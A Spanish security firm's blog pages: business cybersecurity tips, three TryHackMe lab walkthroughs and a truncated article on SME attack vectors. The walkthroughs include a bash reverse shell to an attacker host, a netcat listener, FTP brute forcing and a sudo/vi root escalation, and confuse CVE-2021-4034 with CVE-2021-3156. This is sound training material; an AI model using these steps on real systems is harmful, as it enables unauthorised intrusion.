La ciberseguridad empresarial es un factor crucial para el éxito de cualquier iniciativa de transformación digital en el entorno empresarial. Sin embargo, muchas organizaciones comprometen diariamente su seguridad en línea, no solo debido a la falta de recursos técnicos, sino también por las actividades cotidianas realizadas por sus empleados. La falta de conocimiento y formación interna en ciberseguridad para empresas puede convertirse en una debilidad e incluso representar una amenaza, dejando a la organización vulnerable a posibles ciberataques.
La transformación digital de las pymes y grandes empresas es uno de los principales ejes del Plan de Recuperación implementado por el Gobierno de España, con el respaldo de la UE y los fondos Next Generation. Este enfoque se complementa con otras acciones, como la digitalización de las administraciones públicas, el desarrollo de habilidades digitales en la población, una mayor conectividad, la implementación del 5G y la integración de la inteligencia artificial en el contexto económico actual.
A continuación, presentamos unos consejos sencillos que le ayudarán a fortalecer la ciberseguridad de su empresa y protegerla de posibles ciberataques en línea.
Guía de Ciberseguridad Empresarial: Consejos para Proteger su Negocio
Según el Informe Global de Ciberseguridad 2022, elaborado por la Unión Internacional de Telecomunicaciones (ITU), España se sitúa en el cuarto puesto a nivel mundial en términos de compromiso con la ciberseguridad.
Este informe evalúa 25 indicadores y 5 bloques temáticos, basándose en encuestas realizadas a expertos en ciberseguridad, instituciones, colaboradores y diversos actores involucrados de cada país participante. En cuanto a los cinco bloques temáticos del informe, España obtuvo la mejor puntuación solo en dos áreas, «legal» y «organizacional», mientras que las demás áreas, que incluyen «cooperación», «construcción de capacidad» y «técnica», mostraron un rendimiento inferior.
Tomando en cuenta estos datos, hemos creado esta breve Guía de Ciberseguridad Empresarial que recopila consejos indispensables para evitar ciberataques y proteger la seguridad en línea de su negocio.
Mantener el software actualizado
Es fundamental mantener actualizados el sistema operativo (SO), el antivirus y cualquier otro programa instalado en todos los dispositivos utilizados para las actividades profesionales diarias, como ordenadores de escritorio, portátiles, tablets o smartphones.
Los hackers siempre buscan vulnerabilidades en los sistemas para llevar a cabo ataques cibernéticos. Por esta razón, las empresas deben concienciar a sus empleados sobre la importancia de mantener actualizado el software de los equipos que utilizan durante su jornada laboral. De esta manera, se previenen posibles vulnerabilidades que podrían comprometer información sensible de la compañía, como datos de clientes o información financiera.
Precaución con el correo electrónico
El correo electrónico es una de las principales vías de entrada para los ciberataques. En la actualidad, la mayoría de las empresas utilizan clientes de correo electrónico como Microsoft Outlook o Mozilla Thunderbird, en lugar de servicios de webmail como Gmail, que están destinados a un uso más personal.
Sin importar la herramienta de comunicación corporativa que se utilice, es vital concienciar a los empleados sobre los peligros del mal uso del correo electrónico. En este sentido, se recomienda que la empresa establezca una política clara para el uso seguro y adecuado del correo electrónico, que garantice su protección y prevenga el spam y el phishing.
Tanto el spam (correo no deseado) como las estafas de phishing son mecanismos utilizados por los ciberdelincuentes para obtener datos sensibles como contraseñas y datos bancarios. Para protegerse, se recomienda:
No abrir correos electrónicos de remitentes desconocidos.
Agregar el correo no deseado a la lista de spam y eliminarlo.
Prestar atención a cualquier elemento sospechoso en el contenido del correo electrónico.
Inspeccionar los enlaces antes de hacer clic en ellos.
Activar filtros antispam.
Utilizar contraseñas seguras para acceder al correo electrónico.
Utilizar la función de copia oculta (CCO) al enviar el mismo correo a múltiples destinatarios.
Estas precauciones ayudarán a reducir los riesgos asociados con el correo electrónico y protegerán a la empresa de posibles amenazas cibernéticas.
Realizar copias de seguridad siguiendo la regla del 3-2-1
Es fundamental seguir la regla del 3-2-1 en cuanto a las copias de seguridad para proteger la información valiosa de su negocio. Si no ha oído hablar de esta regla antes, le recomendamos prestar especial atención a este consejo de la Guía de Ciberseguridad para Empresas, ya que puede ayudar a evitar la pérdida total de datos en caso de un posible ciberataque.
Según esta regla, se deben realizar tres copias de seguridad de todos los datos sensibles de la empresa, preferiblemente de manera diaria. Estas copias de seguridad deben almacenarse en al menos dos ubicaciones diferentes, como la nube, un disco local, un disco de red, entre otros. Por último, se aconseja que uno de los dispositivos de almacenamiento se encuentre en un lugar seguro fuera de las instalaciones de la empresa. De esta manera, se establece un sistema de copias de seguridad efectivo que permite proteger y recuperar toda la información en caso de cualquier tipo de ciberataque.
Cerrar siempre la sesión
No seguir este consejo puede tener consecuencias graves relacionadas con el robo de información confidencial por parte de terceros. Por lo tanto, es recomendable cerrar la sesión siempre que se finalice el uso de una cuenta de usuario en cualquier dispositivo.
Contraseñas seguras
El uso de contraseñas, junto con otros métodos de autenticación como huellas dactilares o reconocimiento facial, es fundamental para acceder a dispositivos y servicios en entornos empresariales cada vez más digitalizados.
Sin embargo, el mal uso y la gestión incorrecta de las contraseñas por parte de los empleados pueden generar vulnerabilidades en las organizaciones. Prácticas como anotar contraseñas en papel, reutilizarlas para diferentes programas o compartirlas por correo electrónico son ejemplos de malas prácticas comunes.
Utiliza contraseñas con una longitud de al menos 8 caracteres.
Combina mayúsculas, minúsculas, números y caracteres especiales como paréntesis, arroba, corchetes, etc.
Evita elementos personales como nombres o fechas de nacimiento.
Evita el uso de palabras simples y fáciles de adivinar para evitar ataques de diccionario.
Considera el uso de una cadena de palabras sin relación entre sí.
Cambia tus contraseñas al menos cada seis meses.
Además, como parte de nuestra Guía de Ciberseguridad para Empresas, recomendamos utilizar métodos de autenticación adicionales, los cuales exploraremos en los siguientes puntos.
Navegación segura a través de páginas web con protocolo HTTPS
El protocolo HTTPS es un sistema de seguridad diseñado para mejorar la privacidad de los usuarios mientras navegan por internet. Este protocolo permite cifrar toda la información que se envía y recibe entre el dispositivo de navegación del usuario (por ejemplo, un ordenador) y el sitio web al que accede.
Para saber si estamos accediendo a un sitio web seguro, basta con fijarse en la barra de direcciones y verificar que aparece un candado junto a las letras «https». Esta es una forma sencilla de proteger los datos almacenados en cualquier dispositivo y prevenir filtraciones de información.
Empleo de múltiples métodos de autenticación
Además de utilizar contraseñas seguras, se recomienda emplear otros métodos de autenticación, como el envío de contraseñas de un solo uso (OTP, por sus siglas en inglés) a través de SMS, aplicaciones móviles o voz, entre otros.
Esto asegura que el usuario conoce la contraseña para acceder al servicio y también demuestra que realmente es quien afirma ser, ya que proporciona un código que solo él conoce.
La autenticación de doble o múltiples factores representa un mecanismo de seguridad importante para las empresas, y su implementación puede reducir significativamente los riesgos asociados con posibles ciberataques.
Formación interna
Es esencial que las empresas conciencien a todos sus empleados, sin importar su nivel de responsabilidad, sobre la importancia de adoptar prácticas de trabajo seguras para minimizar las posibles consecuencias de un ciberataque.
La formación interna en el ámbito de la ciberseguridad empresarial no debe subestimarse. Actualmente, es una de las principales preocupaciones para las empresas, ya que un ciberataque puede causar un grave daño a su reputación, seguridad y rentabilidad.
Confía en DCSeguridad
En DCSeguridad, somos líderes en ofrecer soluciones de ciberseguridad confiables y efectivas para proteger tu negocio. Nuestro equipo de expertos está comprometido en ayudarte a salvaguardar tu información sensible y evitar ciberataques.
¿Listo para fortalecer la seguridad de tu empresa? No esperes más, contáctanos hoy mismo y descubre cómo podemos adaptar nuestras soluciones a las necesidades específicas de tu negocio. ¡Únete a nuestra comunidad en nuestro canal de Telegram para recibir consejos y actualizaciones exclusivas!
Protege tu negocio y mantén tus datos a salvo con DCSeguridad. ¡Ponte en contacto con nosotros ahora mismo!
Este manual proporcionará una guía detallada para llevar a cabo una prueba de penetración en la máquina Cat Pictures 2 TryHackMe https://tryhackme.com/room/catpictures2. Está diseñado específicamente para aquellos que se están iniciando en el campo del pentesting, por lo que se explicarán los puntos más importantes en un lenguaje claro y profesional.
Antes de comenzar, es crucial recordar que debes obtener los permisos adecuados y autorización antes de realizar cualquier actividad de pentesting en sistemas o redes que no te pertenezcan. El cumplimiento de la ética y las regulaciones es fundamental en este campo.
Paso 1: Preparación inicial para Cat Pictures 2 TryHackMe
Antes de iniciar la prueba de penetración, es necesario realizar algunas tareas de preparación:
Crea un directorio de trabajo específico para este proyecto y cámbiate al directorio correspondiente. Esto ayudará a organizar tus archivos y facilitará la gestión de la prueba de penetración.
Agrega la dirección IP de la máquina Cat Pictures 2 a tu archivo de hosts. Esto simplificará el acceso a la máquina durante la prueba.
Paso 2: Actualización del sistema
Es recomendable comenzar por actualizar el sistema objetivo con las últimas actualizaciones disponibles. Esto garantizará que se aprovechen las correcciones de seguridad más recientes, lo que puede dificultar la explotación de vulnerabilidades conocidas.
Paso 3: Identificación de la máquina objetivo
Antes de iniciar cualquier exploración, es útil determinar si la máquina objetivo está en línea y obtener información básica sobre ella. Para hacerlo, realiza un ping a la máquina utilizando el siguiente comando:
ping -c 1 <dirección IP>
Este comando enviará un solo paquete de ping y mostrará la respuesta. Al verificar la conectividad y el valor TTL (Time to Live), podrás identificar el sistema operativo en uso.
Paso 4: Escaneo de puertos de Cat Pictures 2 TryHackMe
El siguiente paso consiste en realizar un escaneo de puertos para identificar los servicios que se ejecutan en la máquina. Utilizaremos la herramienta nmap con una serie de opciones para obtener información detallada:
Este comando realizará un escaneo exhaustivo de puertos, incluyendo la detección de servicios, versiones, scripts y generará un archivo de salida en formato CSV llamado nmap_inicial.txt.
Analiza el archivo nmap_inicial.txt para identificar los puertos abiertos. Presta especial atención a los puertos 22, 80, 222, 3000 y 8080, ya que se encontraron servicios SSH y servicios web en estos puertos.
Paso 5: Enumeración de directorios web en Cat Pictures 2 TryHackMe
A continuación, procederemos a enumerar los directorios en los servicios web encontrados en los puertos 80, 3000 y 8080 utilizando la herramienta dirb. Ejecuta los siguientes comandos para cada puerto:
dirb http://<dirección IP>:<puerto>
Analiza cuidadosamente los resultados de la enumeración de directorios en busca de posibles puntos de entrada adicionales.
Paso 6: Análisis de imágenes y metadatos
Después de revisar los directorios y no encontrar resultados significativos, nos centraremos en la exploración de los servicios web. Comenzaremos analizando la página de gatos en el puerto 80.
Después de investigar durante un tiempo, descubrimos que una de las imágenes en la pestaña «información» contiene pistas sobre los siguientes pasos. Descarga esta imagen utilizando el comando wget:
Una vez que hayas descargado la imagen, realiza un análisis de metadatos utilizando la herramienta exiftool:
exiftool imagen.jpg
Examina los metadatos de la imagen y busca cualquier información relevante, como títulos ocultos o datos incrustados. Accede a lo que encuentras y Voalà, ya tienes unas credenciales de acceso.
Paso 7: Acceso a Gitea y descubrimiento de credenciales
Utilizando las credenciales descubiertas en los pasos anteriores, procedemos a acceder al servicio Gitea en el puerto 3000. Al explorar todo en Gitea, encontramos un repositorio local donde descubrimos la primera bandera.
Además, en el punto anterior, hay un puerto mencionado para acceder a otro apartado del servidor. Para aprovechar esta oportunidad, realizaremos una modificación en uno de los archivos encontrados en el repositorio para obtener un reverse shell.
Primero haz pruebas con los botones, veras que en los logs, hay uno que realiza una tarea con uno de los archivos encontrados en el repositorio, y podemos hacer una shell reversa para conseguir un primer acceso al servidor, visita el sitio web revshells.com y genera un codigo bash para el ataque, luego sustituye el command whoami por: bash -c «sh -i >& /dev/tcp/ip_maquina_atacante/puerto/ 0>&1» y guarda el archivo.
Mientras tanto, abre una escucha de Netcat en tu máquina atacante para recibir la conexión entrante del reverse shell. Utiliza el comando nc -lvnp <puerto> en tu máquina atacante, reemplazando <puerto> por el puerto que especificaste en el comando de reverse shell. Una vez abierto, ejecuta la tarea en la pagina de OliveTin.
Una vez que la tarea se haya ejecutado en el servidor, se establecerá una conexión de reverse shell desde el servidor objetivo a tu máquina atacante.
Ahora, tendrás acceso a una shell en el servidor objetivo a través de la conexión de reverse shell. Puedes interactuar con la shell y ejecutar comandos en el servidor.
Para mejorar la shell y tener una experiencia más cómoda, ejecuta el siguiente comando en la shell para iniciar una nueva instancia de bash:
script /dev/null -c bash
Con este proceso, podrás obtener acceso al servidor a través de un reverse shell y mejorar la shell para una mejor interacción.
Paso 8: Escalada de privilegios en Cat Pictures 2 TryHackMe
Una vez dentro de los repositorios en Gitea, busca la primera bandera y continúa explorando. Si es necesario, intenta escalar privilegios utilizando técnicas como sudo, suid o capabilities. Examina cuidadosamente las configuraciones de privilegios y busca posibles vulnerabilidades.
Paso 9: Búsqueda de vulnerabilidades con Linpeas
Si no se encuentra ninguna vulnerabilidad inmediata, procederemos a utilizar la herramienta Linpeas para explorar posibles vulnerabilidades ocultas en el sistema. Descarga el script linpeas.sh en tu máquina atacante ejecutando los siguientes comandos:
Paso 10: Explotación de la vulnerabilidad CVE-2021-4034 en Cat Pictures 2 TryHackMe
Si Linpeas no revela ninguna vulnerabilidad explotable, es posible que necesitemos buscar vulnerabilidades específicas. En este caso, se menciona una vulnerabilidad conocida, CVE-2021-4034, relacionada con la versión de sudo.
Clona el repositorio https://github.com/blasty/CVE-2021-3156 en tu máquina atacante y comprimelo en .tar, a continuación monta un servidor http con python3 -m http.server y desde la maquina victima descarga el archivo, así como descomprimir el .tar, sigue las instrucciones proporcionadas en el repositorio para aprovechar esta vulnerabilidad y elevar los privilegios a root.
¡Importante! Asegúrate de seguir las mejores prácticas de seguridad y obtener permiso antes de utilizar exploits en sistemas que no te pertenecen.
Conclusión Cat Pictures 2 TryHackMe
Una vez que hayas logrado elevar tus privilegios a root, habrás completado exitosamente el pentesting en la máquina Cat Pictures 2 de Try Hack Me. Recuerda documentar todas las etapas y resultados de tu proceso para futuras referencias.
Resumen Cat Pictures 2 TryHackMe
En este manual, hemos proporcionado una guía paso a paso para realizar una prueba de penetración en la máquina Cat Pictures 2 de Try Hack Me. Comenzamos con la preparación inicial, seguida de la actualización del sistema y la identificación de la máquina objetivo. Luego, realizamos un escaneo de puertos y enumeramos los directorios web en los servicios encontrados. Continuamos con el análisis de imágenes y metadatos, el acceso a Gitea y el descubrimiento de credenciales. Después, nos enfocamos en el escalamiento de privilegios y la búsqueda de vulnerabilidades ocultas utilizando Linpeas. Finalmente, exploramos una vulnerabilidad conocida (CVE-2021-4034) y concluimos el proceso.
Esta máquina Cat Pictures 2 de Try Hack Me ofrece un nivel de dificultad medio, lo que la convierte en un buen desafío para aquellos que se están iniciando en el pentesting. Te recomendamos seguir practicando y mejorando tus habilidades en este emocionante campo.
Si estás interesado en obtener más información sobre seguridad y pentesting, te invitamos a ponerte en contacto con nosotros en DCSeguridad. Nuestra empresa cuenta con expertos en seguridad que pueden ayudarte en tus proyectos y desafíos. También puedes unirte a nuestro canal de Telegram para mantenerte actualizado sobre las últimas noticias y recursos en el mundo de la seguridad.
¡Te deseamos buena suerte en tus futuras aventuras de pentesting!
En este manual, te guiaré a través de los pasos necesarios para realizar un pentesting en la máquina «Pickle Rick Try Hack Me https://tryhackme.com/room/picklerick«. Este tutorial está dirigido a personas que se están iniciando en el pentesting, por lo que explicaré los puntos más importantes y te mostraré cómo utilizar las herramientas clave durante el proceso. Asegúrate de seguir cada paso cuidadosamente para obtener resultados exitosos.
Paso 1: Actualizar el sistema operativo
Antes de comenzar con el pentesting, es crucial asegurarse de tener el sistema operativo actualizado. Ejecuta el siguiente comando para actualizar el sistema y sus paquetes a las versiones más recientes disponibles:
apt update && apt upgrade
Este comando garantiza que estés utilizando las últimas actualizaciones de seguridad y las versiones más recientes de los paquetes.
Paso 2: Preparar el entorno para Pickle Rick Try Hack Me
Crea una carpeta dedicada para trabajar con la máquina y asegúrate de tener todos los archivos relacionados en ella. Por ejemplo:
mkdir maquina
cd maquina
Esto creará una carpeta llamada «maquina» y te moverá al directorio recién creado.
Paso 3: Recopilar datos en un archivo de texto
Durante el proceso de pentesting, es esencial mantener un registro de los datos que encuentres. Crea un archivo de texto nuevo para almacenar la información relevante. Por ejemplo:
touch datos.txt
Esto creará un archivo de texto llamado «datos.txt» que puedes utilizar para guardar y organizar los hallazgos importantes.
Paso 4: Añadir la IP de la máquina al archivo host para Pickle Rick Try Hack Me
Para facilitar el acceso a la máquina, agregaremos su dirección IP al archivo de hosts de nuestro sistema. Esto se puede lograr modificando el archivo /etc/hosts y agregando una entrada para la dirección IP de la máquina.
Paso 5: Verificar la conectividad y el TTL
Antes de comenzar el escaneo de puertos, es importante verificar la conectividad con la máquina víctima y obtener información básica sobre ella. Utiliza el siguiente comando para enviar un paquete de ping a la dirección IP de la máquina:
ping -c 1 <ipmaquina>
Esto enviará un único paquete de ping a la dirección IP especificada. Luego, puedes verificar el TTL (Time To Live) en la respuesta del ping para obtener información adicional sobre la máquina.
Paso 6: Escaneo inicial con nmap de Pickle Rick Try Hack Me
El siguiente paso es realizar un escaneo inicial de puertos en la máquina utilizando la herramienta nmap. Ejecuta el siguiente comando:
nmap -A <ipmaquina> -oN nmap_picklerick_inicial
Este comando ejecuta un escaneo detallado de todos los puertos abiertos en la máquina y guarda los resultados en un archivo llamado «nmap_picklerick_inicial». El parámetro -A activa la detección de versiones y la detección de servicios.
Paso 7: Inspeccionar directorios con Gobuster
Para descubrir posibles directorios ocultos o archivos en la web de la máquina, utilizaremos la herramienta Gobuster. Ejecuta el
Este comando realiza un escaneo utilizando una lista de palabras clave contenida en el archivo «directory-list-2.3-medium.txt». La herramienta buscará archivos con las extensiones php, sh, txt, cgi, html, css, js y py.
Paso 8: Acceder a archivos encontrados y realizar inyección de comandos
Después de realizar el escaneo con Gobuster, es posible que hayas encontrado archivos como «robots.txt» y «login.php». Accede a estos archivos utilizando un navegador web o herramientas como curl o wget. Si encuentras una posible contraseña en alguno de los archivos, tómala nota y guárdala en tu archivo de datos para referencia futura.
Paso 9: Realizar un shell inverso en Pickle Rick Try Hack Me
Si has identificado un punto de inyección de comandos en la máquina, puedes aprovecharlo para establecer un shell inverso. Utiliza el siguiente comando PHP, reemplazando «ATTACKING-IP» por tu dirección IP de ataque:
Ahora tendrás control total sobre la máquina como root.
Paso 12: Búsqueda de ingredientes Pickle Rick Try Hack Me
Como usuario root en la máquina víctima, realiza una búsqueda de los tres ingredientes necesarios en los directorios relevantes utilizando comandos como find o grep. Guarda todos los hallazgos en tu archivo de datos para referencia futura.
¡Enhorabuena! Has completado el proceso de pentesting y has hackeado con éxito la máquina Pickle Rick.
Resumen
En este tutorial, hemos seguido una serie de pasos para realizar un pentesting en la máquina Pickle Rick. Comenzamos actualizando el sistema operativo, configurando el entorno de trabajo y recopilando datos en un archivo de texto. Luego, realizamos un escaneo de puertos con nmap, inspeccionamos directorios con Gobuster y accedimos a archivos encontrados. Utilizamos un shell inverso para obtener acceso a la máquina víctima, elevamos nuestros privilegios a root y buscamos los ingredientes necesarios. Al seguir estos pasos, logramos hackear con éxito la máquina Pickle Rick y obtener control total sobre ella.
¡Únete a DCSeguridad en Telegram!
Si estás interesado en el campo de la ciberseguridad y deseas obtener más información, te invitamos a unirte a nuestro canal de Telegram. En DCSeguridad, nos especializamos en ofrecer soluciones y servicios de seguridad avanzados para proteger tus activos digitales. No dudes en ponerse en contacto con nosotros para obtener asesoramiento o ayuda con tus necesidades de seguridad.
¡Asegúrate de visitar nuestro sitio web para obtener más información!
Lo primero que debemos hacer es crear un directorio de trabajo para realizar el pentesting. Esto nos ayudará a mantener organizados todos los archivos y resultados generados durante el proceso.
mkdir yearoftherabbit
cd yearoftherabbit
A continuación, debemos añadir la dirección IP de la máquina objetivo al archivo de hosts para poder acceder a ella fácilmente.
sudo nano /etc/hosts
Agrega la siguiente línea al final del archivo, reemplazando <ipmaquina> con la dirección IP de la máquina objetivo:
<ipmaquina> yearoftherabbit.thm
Guarda los cambios y cierra el editor.
Paso 2: Identificación del sistema operativo de Year of the Rabbit TryHackMe
Antes de comenzar el escaneo de puertos, es útil confirmar la conectividad y determinar el sistema operativo de la máquina objetivo. Para ello, realizaremos un ping y observaremos el valor TTL en la respuesta.
ping -c 1 yearoftherabbit.thm
Si el valor TTL es 63, es probable que estemos ante una máquina Linux.
Paso 3: Escaneo de puertos
El siguiente paso es realizar un escaneo de puertos en la máquina objetivo para identificar los servicios disponibles. Utilizaremos la herramienta Nmap para esto.
-C: Realiza un escaneo con scripts de enumeración básica.
-V: Aumenta el nivel de detalles de la versión del servicio.
--min-rate 5000: Limita la velocidad de envío de paquetes para evitar la detección.
-vvv: Muestra una salida detallada.
-n: No realiza resolución de DNS.
-Pn: Ignora la detección de hosts y trata todas las direcciones IP como en línea.
-oN nmap_yearoftherabbit: Guarda la salida en un archivo llamado «nmap_yearoftherabbit».
Este escaneo nos mostrará los puertos abiertos y los servicios correspondientes, como el FTP (puerto 21), SSH (puerto 22) y Apache (puerto 80).
Paso 4: Inspección del FTP y la web de Year of the Rabbit TryHackMe
Ahora que conocemos los puertos abiertos, podemos realizar una inspección de los directorios de la web utilizando la herramienta wfuzz. Esto nos permitirá descubrir posibles rutas y archivos interesantes.
– --h=404: Ignora las respuestas 404 (no encontradas).
-w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt: Utiliza un archivo de palabras para realizar la enumeración de directorios.
-u http://yearoftherabbit.thm:80/FUZZ: Especifica la URL objetivo y usa «FUZZ» como comodín para reemplazarlo con las palabras del archivo.
Este comando buscará directorios y archivos en la web y mostrará cualquier resultado interesante. Accedemos a el y vemos lo siguiente.
Paso 5: Investigación del directorio oculto
En el paso anterior, hemos encontrado un directorio oculto. Para obtener más información sobre este directorio, ya que nos redirige a otra página, utilizaremos la herramienta Burp Suite. Burp Suite nos permitirá interceptar y analizar el tráfico HTTP.
Abre Burp Suite e importa el certificado raíz en tu navegador siguiendo las instrucciones proporcionadas por la herramienta.
Configura tu navegador para usar el proxy de Burp Suite y visita la URL del directorio oculto encontrado en el paso anterior. Examina cuidadosamente las respuestas y los elementos presentes en la página para obtener información adicional.
Paso 6: Descarga y análisis de una imagen en Year of the Rabbit TryHackMe
En el directorio oculto, encontramos una imagen que puede contener información oculta. Descargaremos la imagen utilizando la herramienta wget.
wget http://yearoftherabbit.thm:80/imagen.jpg
Luego, analizaremos la imagen en busca de información oculta utilizando la herramienta binwalk.
binwalk imagen.jpg -e --run-as=root
Explicación de los comandos y flags utilizados:
-e: Extrae los archivos incrustados en la imagen.
--run-as=root: Ejecuta binwalk con privilegios de root para acceder a archivos restringidos.
Binwalk nos mostrará cualquier archivo oculto o información incrustada en la imagen.
Paso 7: Análisis de los archivos extraídos
Ahora que hemos extraído los archivos incrustados en la imagen, utilizaremos el comando cat para ver el contenido de cada archivo y buscar información relevante.
cat archivo1.txt
cat archivo2.txt
...
Uno de los archivos puede contener una serie de contraseñas y un usuario de FTP.
Paso 8: Guardar las contraseñas
Guardaremos las posibles contraseñas en un archivo llamado «contraseñas.txt» para su posterior uso.
nano contraseñas.txt
Copia las contraseñas encontradas en el paso anterior y péguelas en el archivo. Guarda los cambios y cierra el editor.
Paso 9: Ataque de contraseña a FTP de Year of the Rabbit TryHackMe
Utilizaremos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña.
Reemplaza <usuario_ftp> con el usuario de FTP encontrado en los pasos anteriores.
Hydra intentará diferentes contraseñas utilizando la lista proporcionada en el archivo «contraseñas.txt».
Paso 10: Descarga y análisis de un archivo en FTP
Una vez hayas obtenido acceso al servidor FTP, descarga cualquier archivo que encuentres relevante utilizando el comando get archivo.txt. Luego, sal del servidor FTP y analiza el contenido del archivo descargado mediante el comando cat.
ftp year
oftherabbit.thm
get archivo.txt
exit
cat archivo.txt
Paso 11: Decodificación de un archivo codificado en Brainfuck
Si el archivo descargado está codificado en Brainfuck, accede al sitio web https://www.dcode.fr/brainfuck-language y pega el contenido del archivo en el campo de entrada. Luego, haz clic en «Decode» para obtener el mensaje decodificado.
Paso 12: Acceso SSH utilizando las credenciales obtenidas a Year of the Rabbit TryHackMe
Una vez hayas decodificado el archivo y obtenido las credenciales de SSH, utiliza el siguiente comando para acceder a la máquina objetivo.
ssh <usuario>@yearoftherabbit.thm
Reemplaza <usuario> con el usuario obtenido.
Paso 13: Lectura de un archivo oculto para otro usuario
Una vez hayas accedido por SSH, busca y lee el archivo oculto mencionado en el mensaje utilizando el comando cat.
cat archivo_oculto.txt
En este archivo encontrarás una nueva contraseña para otro usuario.
Paso 14: Escalada de privilegios en Year of the Rabbit TryHackMe
Sal del usuario actual utilizando el comando exit y accede nuevamente por SSH utilizando las nuevas credenciales obtenidas en el paso anterior.
ssh <otro_usuario>@yearoftherabbit.thm
Reemplaza <otro_usuario> con el usuario obtenido.
Paso 15: Escalada de privilegios con sudo en Year of the Rabbit TryHackMe
Verifica los privilegios disponibles utilizando el comando sudo -l. Observa si existe alguna oportunidad para escalar privilegios mediante el comando vi.
sudo -l
En este caso, se observa que es posible escalar privilegios mediante el comando vi.
Paso 16: Escalada de privilegios con sudo y vi en Year of the Rabbit TryHackMe
Aprovecha una vulnerabilidad en la versión de sudo para escalar privilegios ejecutando el siguiente comando:
sudo -u#-1 /usr/bin/vi user.txt
Esto permitirá ejecutar el editor vi con privilegios de root y acceder al archivo «user.txt».
Paso 17: Obtención de acceso root
Una vez dentro del editor vi, ingresa :!/bin/sh y presiona Enter. Ahora tendrás acceso root a la máquina objetivo.
Recuerda que realizar pruebas de penetración en sistemas o redes sin permiso y autorización es ilegal. Asegúrate siempre de obtener el consentimiento del propietario del sistema o red antes de realizar cualquier actividad de pentesting.
Resumen Year of the Rabbit TryHackMe
En este manual, hemos llevado a cabo el pentesting de la máquina Year of the Rabbit de la plataforma Try Hack Me. Comenzamos preparándonos creando un directorio de trabajo y agregando la máquina objetivo al archivo de hosts.
A continuación, realizamos una identificación del sistema operativo utilizando el comando ping y observando el valor TTL. Luego, llevamos a cabo un escaneo de puertos utilizando la herramienta Nmap para descubrir los servicios y puertos abiertos en la máquina.
Realizamos una inspección de los directorios de la web utilizando la herramienta wfuzz, buscando posibles directorios ocultos. Utilizamos Burp Suite para investigar un directorio oculto y obtener más información.
Descargamos y analizamos una imagen encontrada en el directorio oculto utilizando las herramientas wget y binwalk. Exploramos los archivos extraídos y examinamos su contenido.
Guardamos las contraseñas encontradas en un archivo y utilizamos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña. Descargamos y analizamos un archivo del servidor FTP.
Decodificamos un archivo codificado en Brainfuck utilizando un sitio web especializado. Accedimos por SSH utilizando las credenciales obtenidas y leímos un archivo oculto para otro usuario.
Realizamos una escalada de privilegios aprovechando una vulnerabilidad en sudo y vi. Finalmente, obtuvimos acceso root a la máquina objetivo.
¡Únete a DCSeguridad y contáctanos hoy mismo!
DCSeguridad es una empresa líder en el campo de la seguridad informática y el pentesting. Nuestro equipo de expertos altamente calificados y con amplia experiencia está listo para ayudarte a proteger tu infraestructura digital.
Si estás interesado en fortalecer la seguridad de tu empresa, te invitamos a que te pongas en contacto con nosotros. Ofrecemos servicios personalizados y soluciones integrales para proteger tus sistemas contra posibles amenazas y vulnerabilidades.
Además, te invitamos a unirte a nuestro canal de Telegram, donde compartimos contenido exclusivo sobre seguridad informática, consejos, últimas tendencias y noticias del mundo de la ciberseguridad. Es una excelente oportunidad para mantenerte actualizado y aprender de los mejores en el campo.
En DCSeguridad, entendemos la importancia de la seguridad en la era digital y estamos comprometidos en brindarte soluciones confiables y efectivas. No escatimamos esfuerzos para asegurar la confidencialidad, integridad y disponibilidad de tu información.
¡No esperes más y protégete con DCSeguridad! Contáctanos hoy mismo y únete a nuestro canal de Telegram para acceder a un mundo de conocimiento y seguridad digital.
Recuerda que el pentesting debe realizarse siempre con permiso y autorización.
En este artículo, abordaremos los seis vectores de ataque principales a los que las PYMES están expuestas, y proporcionaremos información valiosa para ayudar a los propietarios de negocios a proteger sus redes y activos.
En el mundo actual, donde la tecnología es una parte esencial de nuestras vidas y de nuestros negocios, la seguridad de la información se ha convertido en una preocupación cada vez mayor. Las pequeñas y medianas empresas (PYMES) no son una excepción, ya que se han convertido en blancos atractivos para los ciberdelincuentes debido a su relativa falta de recursos y medidas de seguridad insuficientes.
Antes de sumergirnos en los detalles de los vectores de ataque, es importante comprender qué son y cómo pueden afectar a una PYME. Un vector de ataque se refiere a la forma en que un ciberdelincuente intenta infiltrarse en una red o sistema informático con el fin de obtener acceso no autorizado o causar daño. Estos vectores pueden variar en su complejidad y sofisticación, pero cada uno representa una amenaza significativa para la seguridad de una empresa.
Ahora, sin más preámbulos, vamos a explorar los seis principales vectores de ataque a una PYME:
Correo Electrónico
El correo electrónico se ha convertido en una herramienta indispensable en el entorno empresarial actual, pero también es uno de los principales vectores de ataque. Los ciberdelincuentes utilizan técnicas como el phishing, en el cual se hacen pasar por entidades legítimas para engañar a los empleados y obtener información confidencial, como contraseñas o datos bancarios. Es fundamental educar a los empleados sobre cómo identificar y evitar correos electrónicos fraudulentos, así como implementar soluciones de filtrado de correo y autenticación robustas.
Uso Inapropiado de Activos
El uso inapropiado de activos internos puede representar una amenaza significativa para la seguridad de una PYME. Los empleados pueden acceder a información confidencial o valiosa y utilizarla de manera indebida o incluso venderla a terceros. Para mitigar este riesgo, es esencial establecer políticas claras de seguridad de la información, restringir el acceso a los activos sensibles y capacitar regularmente a los empleados sobre la importancia de proteger la información de la empresa.
Vulnerabilidades Conocidas
Los sistemas y aplicaciones utilizados por las PYMES a menudo tienen vulnerabilidades conocidas que los ciberdelincuentes pueden aprovechar. Esto puede incluir software desactualizado, configuraciones predeterminadas inseguras o parches de seguridad no aplicados. Para mitigar este riesgo, es crucial mantener todos los sistemas y aplicaciones actualizados con los últimos parches de seguridad, así como implementar soluciones de escaneo de vulnerabilidades para identificar y solucionar posibles puntos débiles en la infraestructura de TI.
Pérdida o Robo de Activos
La pérdida o el robo físico de activos, como dispositivos móviles o laptops, puede tener graves consecuencias para una PYME. Estos dispositivos pueden contener información confidencial o datos sensibles que podrían ser explotados por ciberdelincuentes. Es fundamental implementar medidas de seguridad física, como el cifrado de datos, contraseñas de acceso y el seguimiento remoto de dispositivos, para minimizar el riesgo de pérdida o robo de activos.
Almacenamiento Externo
Muchas PYMES utilizan dispositivos de almacenamiento externo, como unidades USB o discos duros portátiles, para compartir y transportar información. Sin embargo, estos dispositivos también pueden ser una fuente de riesgo si se pierden o caen en manos equivocadas. Para protegerse, es necesario implementar políticas de uso de dispositivos externos, como la encriptación de datos y la restricción de acceso a dispositivos no autorizados.
Vectores Externos
